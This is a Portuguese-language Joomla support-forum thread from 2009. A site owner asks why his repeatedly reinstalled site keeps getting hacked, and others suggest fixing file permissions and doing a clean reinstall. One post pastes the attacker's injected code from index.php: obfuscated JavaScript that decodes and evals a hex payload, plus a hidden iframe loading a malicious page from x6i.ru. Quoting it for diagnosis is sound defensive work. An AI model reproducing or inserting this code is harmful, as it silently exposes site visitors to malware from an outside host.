Site sendo [removed] várias vezes

Moderators: ariadneduvessa, ariadneduvessa

Locked
gonzoxm
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Thu Sep 13, 2007 5:33 pm

Site sendo [removed] várias vezes

Post by gonzoxm » Thu Jul 30, 2009 6:03 am

Olá pessoal!
Possuo um site desenvolvido em joomla que vinha sendo alvo de ataques por diversas vezes estes ultimos meses, fiz de tudo atualizei a versão do joomla, alterei as senhas do ftp e banco de dados, etc. Mesmo assim este conseguia ser invadido.
Ontem resolvi então deletá-lo completamente deixando o directório public_html absolutamente vazio, criei um diretório chamado site e instalei o joomla 1.5.13 neste e coloquei um arquivo index na raiz redirecionando para pasta e alterei a senha do ftp colocando varios digitos entre estes números, letras maiusculas, letras minusculas e caracteres especiais.
Coloquei o site offline e não instalei nada, para minha surpresa em menos de 24 horas este já havia sido [removed] novamente? Aí então vem minha pergunta.
Terá o joomla uma falha de segurança absurda como esta? Seria o servidor? Atualmente esta hospedado na Speed Server http://www.speedserver.com.br/
O link do site é www.baraovip.com.br
Agradeço qualquer resposta

User avatar
ronildo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4022
Joined: Thu Aug 18, 2005 12:39 pm
Location: São Paulo - Brazil
Contact:

Re: Site sendo [removed] várias vezes

Post by ronildo » Thu Jul 30, 2009 6:50 am

Você poderia disponibilizar o log do seu site para tentarmos descobrir como está sendo feita essas invasões??
http://www.ronildo.com.br/blog/ pt-br | twitter: twitter.com/ronildo
http://forum.joomla.org/viewtopic.php?f=23&t=144443 - FAQ Joomla [pt]
Pessoal por favor não tiro dúvidas por e-mail nem mensagem privada, por favor não insistam.

gonzoxm
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Thu Sep 13, 2007 5:33 pm

Re: Site sendo [removed] várias vezes

Post by gonzoxm » Thu Jul 30, 2009 6:07 pm

oi Ronilson só possuo o log de hoje vou verificar com o servidor se possuem logs anteriores. Caso não possuam apagar tudo novamente e esperar para ver em quanto tempo será [removed], pelo que vi provavelmente amanhã, assim terei o log completo.
O Log está em anexo. Percebi também que este acrescentou em todas as páginas index.php o código

Code: Select all

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
<script>c07z53='';y33e9036d4=/* y38049 */document;y33e9036d4.write('<scr'+'ipt>function yd86d6957b1(y8b8d6ccf65d)
{return e'+c07z53+'val(y8b8d6ccf65d); }</scr'+'ipt>');  function c074a21767yf0a7d3640(ya03396ba6d8){ var y71a95ff331a=16; var z44='';return (yd86d6957b1('par'+z44+'seInt')(ya03396ba6d8,y71a95ff331a));}function y633cb834ef(y600d260){ 
var ya171ced1=2; var y91fd8='';y34069='fromCh';y1b99c=String[y34069+'arCode'];for(y51599611=0;y51599611<y600d260.length;y51599611+=ya171ced1){ y91fd8+=(y1b99c(c074a21767yf0a7d3640(y600d260.substr(y51599611,ya171ced1))));}return y91fd8;} 
var yaaca98c70c2='3C7363726970743E69662821'+c07z53+'6D796961'+c07z53+'297B646F63756D656E742E777269746528756E65736361'
+c07z53+'7065282027253363253639253636253732253631'+c07z53+'253664253635253230253665253631'+c07z53
+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07z53+
'253266253266253636253732253635253733253638253733253735253664253664253635253732253265253732253735253266253733253735253665253733253638253639253665253635253265253638253734253664253663253366253237253262253464253631'
+c07z53+'253734253638253265253732253666253735253665253634253238253464253631'+c07z53+'253734253638253265253732253631'+c07z53+
'253665253634253666253664253238253239253261'+c07z53+'253334253338253330253336253338253239253262253237253636253634253339253633253632253338253634253333253632253237253230253737253639253634253734253638253364253337253338253338253230253638253635253639253637253638253734253364253336253331'
+c07z53+'253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07z53+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'
+c07z53+'2536642536352533652729293B7D7661'+c07z53+'72206D796961'+c07z5
<iframe src="http://x6i.ru:8080/index.php" width=186 height=111 style="visibility: hidden"></iframe>
You do not have the required permissions to view the files attached to this post.

User avatar
ronildo
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4022
Joined: Thu Aug 18, 2005 12:39 pm
Location: São Paulo - Brazil
Contact:

Re: Site sendo [removed] várias vezes

Post by ronildo » Sat Aug 01, 2009 3:48 am

Eu acho que isso e problema de permissao, ja tive isso no meu blog, quando as pastas estavam com permissao 777, quando na verdade deveria ser 644 pra arquivos e 755 pra pastas.

Tente ver como esta suas permissoes.

E Ronildo nao Ronilson... ja e feio nao complique mais... heheheheh
http://www.ronildo.com.br/blog/ pt-br | twitter: twitter.com/ronildo
http://forum.joomla.org/viewtopic.php?f=23&t=144443 - FAQ Joomla [pt]
Pessoal por favor não tiro dúvidas por e-mail nem mensagem privada, por favor não insistam.

User avatar
velazquez
Joomla! Intern
Joomla! Intern
Posts: 87
Joined: Wed Aug 08, 2007 5:53 pm
Location: Santos - SP
Contact:

Re: Site sendo [removed] várias vezes

Post by velazquez » Tue Aug 04, 2009 2:24 pm

Já tive o mesmo problema

e pior o Infeliz colocou um script que tava derrubando o servidor dentro de um ds arquivos do core do joomla
Comunidade,Comunidade,Comunidade
http://www.cezarvelazquez.com.br

User avatar
fititnt
Joomla! Hero
Joomla! Hero
Posts: 2350
Joined: Sat Jul 15, 2006 1:41 am
Location: Porto Alegre - RS - Brazil
Contact:

Re: Site sendo [removed] várias vezes

Post by fititnt » Wed Aug 05, 2009 5:14 am

1. Faz backup de tudo, mesmo que esteja 'infectado'. Nunca se sabe.
2.Deleta tudo no servidor. Transfere arquivos novos baixados dos respectivos sites. Um modo simples de fazer isso é ver quais extensoes tinha, instalar em um outro joomla qualquer, e só copiar todos os arquivos deste outro joomla, e so editar o configuration.php.
3. Adicionar os arquivos que eram diferentes e que foram criados ( em geral só o que está na pasta /images
4. Pronto, a menos que tenha havido algum problema ou tenham alterado seu banco de dados ( algo não comum, mas também não é impossivel 0 seu site estará OK novamente, so verificar e arrumar falhas de segurança anteriores.


Também da pra checar arquivo por arquivo comparando com os do core padrão e ver diferenças. tem programas que comparam arquivos.
Emerson da Rocha Luiz
Moderador aposentado, 2008-2014 | Membro do JUGRS
http://www.fititnt.org


Locked

Return to “Segurança”